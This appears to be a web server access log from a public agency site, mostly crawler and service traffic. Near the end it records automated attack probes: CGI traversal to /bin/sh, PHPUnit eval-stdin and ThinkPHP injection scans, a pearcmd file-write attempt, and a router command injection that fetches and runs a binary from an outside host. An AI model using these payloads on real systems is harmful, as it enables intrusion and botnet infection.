201.245.192.253 - - [03/Jul/2024:04:17:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33467
201.245.192.253 - - [03/Jul/2024:04:16:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 16384
201.245.192.253 - - [03/Jul/2024:04:18:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.32 - - [03/Jul/2024:04:18:14 -0500] "GET /BLA/resoluciones/AUTOS%202023/2881.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Jul/2024:04:18:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [03/Jul/2024:04:18:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4630.pdf HTTP/1.1" 200 352009
201.245.192.253 - - [03/Jul/2024:04:19:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
201.245.192.253 - - [03/Jul/2024:04:19:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39627
216.245.221.92 - - [03/Jul/2024:04:19:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Jul/2024:04:17:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:04:19:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:20:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33467
201.245.192.253 - - [03/Jul/2024:04:20:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [03/Jul/2024:04:19:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
40.77.167.32 - - [03/Jul/2024:04:20:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/3863.pdf HTTP/1.1" 304 -
172.22.2.4 - - [03/Jul/2024:04:18:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49224
201.245.192.253 - - [03/Jul/2024:04:20:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [03/Jul/2024:04:20:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3387.pdf HTTP/1.1" 200 271383
172.22.2.4 - - [03/Jul/2024:04:21:29 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [03/Jul/2024:04:21:30 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [03/Jul/2024:04:21:30 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [03/Jul/2024:04:21:30 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [03/Jul/2024:04:21:30 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [03/Jul/2024:04:21:30 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [03/Jul/2024:04:21:30 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [03/Jul/2024:04:21:31 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [03/Jul/2024:04:21:31 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [03/Jul/2024:04:21:31 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [03/Jul/2024:04:21:31 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
201.245.192.253 - - [03/Jul/2024:04:21:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
20.15.133.173 - - [03/Jul/2024:04:22:05 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [03/Jul/2024:04:22:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
20.15.133.185 - - [03/Jul/2024:04:22:15 -0500] "GET /Publicaciones/2024EE67459.pdf HTTP/1.1" 404 227
201.245.192.253 - - [03/Jul/2024:04:22:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
57.141.7.8 - - [03/Jul/2024:04:22:37 -0500] "GET /en-semana-santa-jardin-botanico-una-opcion-vital-para-reconectarse-y-vivir-la-naturaleza.html HTTP/1.1" 200 1012
201.245.192.253 - - [03/Jul/2024:04:23:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
185.191.126.213 - - [03/Jul/2024:04:23:46 -0500] "GET / HTTP/1.1" 200 319
66.249.66.11 - - [03/Jul/2024:04:24:06 -0500] "GET /Publicaciones/2024EE121332.pdf HTTP/1.1" 404 228
201.245.192.253 - - [03/Jul/2024:04:24:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:04:24:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
216.245.221.92 - - [03/Jul/2024:04:24:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:04:24:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:04:23:06 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 51561
114.119.128.44 - - [03/Jul/2024:04:24:46 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.12 - - [03/Jul/2024:04:25:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8806.pdf HTTP/1.1" 200 355452
172.22.2.4 - - [03/Jul/2024:04:23:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:04:25:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:26:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [03/Jul/2024:04:24:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51986
201.245.192.253 - - [03/Jul/2024:04:26:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:26:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39170
201.245.192.253 - - [03/Jul/2024:04:26:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33467
201.245.192.253 - - [03/Jul/2024:04:27:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:28:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:04:28:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:29:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39627
201.245.192.253 - - [03/Jul/2024:04:29:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
216.245.221.92 - - [03/Jul/2024:04:29:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:04:29:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
207.46.13.154 - - [03/Jul/2024:04:29:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/4735.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Jul/2024:04:29:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33467
66.249.66.21 - - [03/Jul/2024:04:30:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1920.pdf HTTP/1.1" 200 433179
201.245.192.253 - - [03/Jul/2024:04:30:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.19 - - [03/Jul/2024:04:30:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1803.pdf HTTP/1.1" 304 -
66.249.66.20 - - [03/Jul/2024:04:30:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9518.pdf HTTP/1.1" 200 653522
66.249.66.21 - - [03/Jul/2024:04:30:10 -0500] "GET /BLA/resoluciones/AUTOS%202013/1403.pdf HTTP/1.1" 200 573103
186.102.11.98 - - [03/Jul/2024:04:30:13 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+Ol9LbZv55kXwlHIJI1JUbMYCIbSpBLwXELNodPW6luBaYh2zwApEsW5gV/TTSAyNgzlfa21rVHG3byvYoLuXhslMT8LGyZSOM7SPBrZxTeeEBWUJrbcX3ysj6OkOsDt+otdoclbLsgAW5axQWUXmtaTTEFEc13uwtEaZN1MqlPFQRiPQ50Aqd6WayE2eBxBnGrC+G1lbUu5UZEXNSIWC2xs4YRXWYecfh4R+QphLp2cm53LZSaN0vCsYvPrEnIrzm9h3c3giibg==&u=U2FsdGVkX18wLDVhh8gtOXsLkLXJ1yzE/YaAQgeJwIhfs93i/0mpSGBWvPfj7+WH&y=U2FsdGVkX19M9tuXV1zpjmsTc3Mrbij3XMMc3TIxM7ldRaQyIIY1Cqcl+DJCRkyM HTTP/1.1" 200 26
186.102.11.98 - - [03/Jul/2024:04:30:14 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19nMVQ+9sgE1Yi61L1TG1TrZq7P622OENwo9QoSUPcXiLH9rE0PYHmYWX676UvYA4IU6VnvLvKHvYPSYl/oYt6B1/1VQWK6hPfzbhv8u1yt6GF1aR+cUrrE8OPk7Cn13lJs9uIxqGDBZhcohr98p7hL0f/ednTgh4POk50VNzDX9FI6C5A1+azmBYUkNz2O4x0Jsf6fpFKtpzBLXG9jOm0+1igFcwGH2OswAAY4tR9wVlbtvYwNjMU29Eu6JPT6ck52PD1BlUwAVXvoL5QtFK0QYtVX6yUvS/oq9+MWM3gv8GyAQl0TGC+AA3077DY0n6AZxjB7Mci9EZljB15r1bBAT6qwea4r6+G55/R+YnbNxh0cHE7+rGKCByPEmjhh/5y+srsQZR6M8ogtWrMiD8zvG9yuunTmKfoyncUQvFYjqmZbZ/TpNnUKHW9KqwQ05N3/iVGUaqAn/NQCz7RJgNOC+ULdEeyYkiobvdvXCQYMsKbuimLhFp1HTUPbNOa3pQHHKpiEhJ2PRzOJO1GYbuIFQm8LlDIUB1gSZJyBGLejStOc9o/JVjRzfBEqtPYiYZMi2aiy707xPsu/5tnNIR1UFB2WoPrmtIOeuBFGCDQFQZqIpGVMvqRTPx9qAtv1YxW1ZEz0JzYteqs00ad6lV2vyMjfBC34fEnsvLl3kPC6elzrOEiEFph9S/NsZGK8H5pa+IJuzZ/bpOrZPUB6FkxQofEe24Zpeh1DVzhuKvbh5PNMmIbapT3g1eqOC7/q+wj8TOg9xive8QrSzrzxyoeF1wJXtmA0BaqyV051CE2HsnQtVAvFBGeCsbHys1FyMLsgLs6iF4U847bZ05jqfH6/+5vtU+VnXagnLLuK+gJMBgZvO0AKsyWIZtx7MXVg0aMI6hPI/AnzCXTEOi2Hd5BsLYviPa5GKQ/DiPryFj1lRSZW4AO/mf+bC8/iihOEQ2SwK6Ig9GxEDJLpD2uf049bCVQyTfstP2sNjYLVP0ArzncCOjBOZtx9GZ9Lvp8Xm7u2x47Pc89URRwzebHu0pAVv4DkDpGAB2aOQHsFH/c9fB6dHspiymR35/YsutSCc8N5GyLLmPHJB+zP4epdf1rswHbEz6IZ/Icr2hVBiEdBKVx2ri4RixNOcoorsYGztc3wQPNQ5yBxgqeQLqwXKNFjiJQhAaF3Ime11Kpg01jyauMteaoUSEZw1gGnFum/IMdqGDZyxTQTYEG0QKkExWbe5xQU9elVlUUzUReOUnnvfp9MC/2iJ2T8gBVJWc3tko42ISM67Fm6qDtMc9fSABveaq9myqiGCkunvCtVNlj8rOFH2Wk3CeNtXpHGKDjn5eQErgF/bLRvKhaJQDfSaWEDU7bfBRD7kUlHHEvi6vdsYpkSK7sfyo0+PcQEj1H3M95JllLxb2n+BwpCIsZHFqJbwMz03YLuraoi6Rd0rnwTpFCk+OX4iygLubzS6H6JeBKrbShZAYHrouoBUGJIULAIV7a438qz5Oz1t2sEa0782HXKwjoU5vdZPKvdayk4baSI4NiT/SCrjUp/CYKhzXK/jTazMOkmt7vSzRoAqr1O7YJ5wMfXzl5e5bHJcsIch0OBLAFJqdNHS55cOiTOErkmlGG2/HTgD0uw54o6Am6z8ODqjlAsBGnkWFdwKMlQQTiOPM+Vnlovw6Pykj2jlIGHIQvbtEPx9jhykemUP5OMgrp+cSrWxApI/gz/gnZhnEYi5EZsuT3fiAqaH/EPLFtclODg5CxGoF9vwxv50YcTyHGpqM6n7aTSHIfM88CXRIRSRNJcMBFL7bQnkAqPXhgtP7ngTJ96CQ8/8XOoaKrB4z1Pp8FJZM6K8R5nfioG7pKSdrecacYXdyhsMO+eohGuvdKQXevchkJw+zQ08Z67MSyFYR/YD8LJ&u=U2FsdGVkX18wLDVhh8gtOXsLkLXJ1yzE/YaAQgeJwIhfs93i/0mpSGBWvPfj7+WH&y=U2FsdGVkX19M9tuXV1zpjmsTc3Mrbij3XMMc3TIxM7ldRaQyIIY1Cqcl+DJCRkyM HTTP/1.1" 200 26
186.102.11.98 - - [03/Jul/2024:04:30:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+NLQ7ld5VYpgwpK+U2e2vWRbxHjmAXDjKoi8HcA/sEnrPYSOo6vDPyC2g7iOHC6OXV7U8u1WRq1PJdRMuzBIwtMtC3ogV3MpDkuyH2zJJxCOToT4gXgTtCHIqqdI+tmXd/tEYWXiXmJwsCIrJqvcZLL5xTtA0UBv0=&u=U2FsdGVkX18wLDVhh8gtOXsLkLXJ1yzE/YaAQgeJwIhfs93i/0mpSGBWvPfj7+WH&y=U2FsdGVkX19M9tuXV1zpjmsTc3Mrbij3XMMc3TIxM7ldRaQyIIY1Cqcl+DJCRkyM HTTP/1.1" 200 26
186.102.11.98 - - [03/Jul/2024:04:30:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/3yzb0MOWCixSUTlXWu5G+FPJG+m1gC+JuWn2mjvL2SYUJx7WvZO4kv1p8z7up5Sn5Fh4eU33Ag0IEPYJqOlktFOvH+QOdhIQM25MAuyYV1vG8IWuxjgfRCWG1mlzSvvTIofYFm0zs02AQ6k9lcye07G00vR1SyxU=&u=U2FsdGVkX18wLDVhh8gtOXsLkLXJ1yzE/YaAQgeJwIhfs93i/0mpSGBWvPfj7+WH&y=U2FsdGVkX19M9tuXV1zpjmsTc3Mrbij3XMMc3TIxM7ldRaQyIIY1Cqcl+DJCRkyM HTTP/1.1" 200 26
186.102.11.98 - - [03/Jul/2024:04:30:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19mcrhZigCOFvk3miRwRovpw25RF40+4k3bi1HPh9XQxGniZk4In83tKDd0M9Zdn6gr/IDDfoxsZmKxp3gQuCSzGsILB9qs9wbgTgyg3GsY+oBJuG7PzI7VgfYRFlVhKToz5usXG+2vQCfG027djYUQOSkoQErkAmY=&u=U2FsdGVkX18wLDVhh8gtOXsLkLXJ1yzE/YaAQgeJwIhfs93i/0mpSGBWvPfj7+WH&y=U2FsdGVkX19M9tuXV1zpjmsTc3Mrbij3XMMc3TIxM7ldRaQyIIY1Cqcl+DJCRkyM HTTP/1.1" 200 26
186.102.11.98 - - [03/Jul/2024:04:30:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19dHpUYkoNZFfQR6D/U1u7EhOYDcS8mIDX4c7aZiXPng94UiNyn/ozAYDOaVC9LA43/i12D7QE5eO7CN61BL1TrRYb7S7rOcmSJZtdejM3W6+2gZjySvH3u0mLhMX8lTNj8rCG+LBVpQRoZk+dEJ64NWSYasaufuqC7UrTKgs9NqqfeUAQkjGl6QpCNCpgsO0lopLX34zopsw==&u=U2FsdGVkX18wLDVhh8gtOXsLkLXJ1yzE/YaAQgeJwIhfs93i/0mpSGBWvPfj7+WH&y=U2FsdGVkX19M9tuXV1zpjmsTc3Mrbij3XMMc3TIxM7ldRaQyIIY1Cqcl+DJCRkyM HTTP/1.1" 200 26
201.245.192.253 - - [03/Jul/2024:04:30:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:04:29:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:04:31:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:04:30:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [03/Jul/2024:04:32:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:04:32:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:33:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:34:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.21 - - [03/Jul/2024:04:34:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5341.pdf HTTP/1.1" 200 433138
201.245.192.253 - - [03/Jul/2024:04:34:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
216.245.221.92 - - [03/Jul/2024:04:34:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:04:34:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [03/Jul/2024:04:34:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4871.pdf HTTP/1.1" 200 355261
66.249.66.21 - - [03/Jul/2024:04:34:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3846.pdf HTTP/1.1" 200 372207
45.128.232.22 - - [03/Jul/2024:04:35:04 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 945
45.128.232.22 - - [03/Jul/2024:04:35:05 -0500] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 945
45.128.232.22 - - [03/Jul/2024:04:35:06 -0500] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:06 -0500] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:07 -0500] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:08 -0500] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:08 -0500] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:09 -0500] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:09 -0500] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:10 -0500] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:10 -0500] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:11 -0500] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:11 -0500] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:12 -0500] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:12 -0500] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:13 -0500] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:13 -0500] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:14 -0500] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:14 -0500] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:15 -0500] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:15 -0500] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:16 -0500] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:17 -0500] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:17 -0500] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:18 -0500] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:18 -0500] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:19 -0500] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:20 -0500] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:21 -0500] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:22 -0500] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:23 -0500] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:24 -0500] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:25 -0500] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:26 -0500] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:27 -0500] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:28 -0500] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:29 -0500] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:30 -0500] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:31 -0500] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:32 -0500] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:33 -0500] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:34 -0500] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php HTTP/1.1" 404 1018
45.128.232.22 - - [03/Jul/2024:04:35:35 -0500] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 1018
201.245.192.253 - - [03/Jul/2024:04:35:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
151.235.175.132 - - [03/Jul/2024:04:35:57 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [03/Jul/2024:04:36:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
45.148.10.174 - - [03/Jul/2024:04:36:10 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
45.148.10.174 - - [03/Jul/2024:04:36:11 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
201.245.192.253 - - [03/Jul/2024:04:36:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [03/Jul/2024:04:37:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201651-1700/00001676.tif HTTP/1.1" 200 148070
172.22.2.4 - - [03/Jul/2024:04:35:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.12 - - [03/Jul/2024:04:37:16 -0500] "GET /IsolucionSDA/FrameSetArticulo.asp?Pagina=/IsolucionSDA/bancoconocimiento/M/MatrizdeidentificacionderequisitosSIG_v11/MatrizdeidentificacionderequisitosSIG_v11.asp?IdArticulo=8554 HTTP/1.1" 200 527
201.245.192.253 - - [03/Jul/2024:04:37:36 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Jul/2024:04:37:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33467
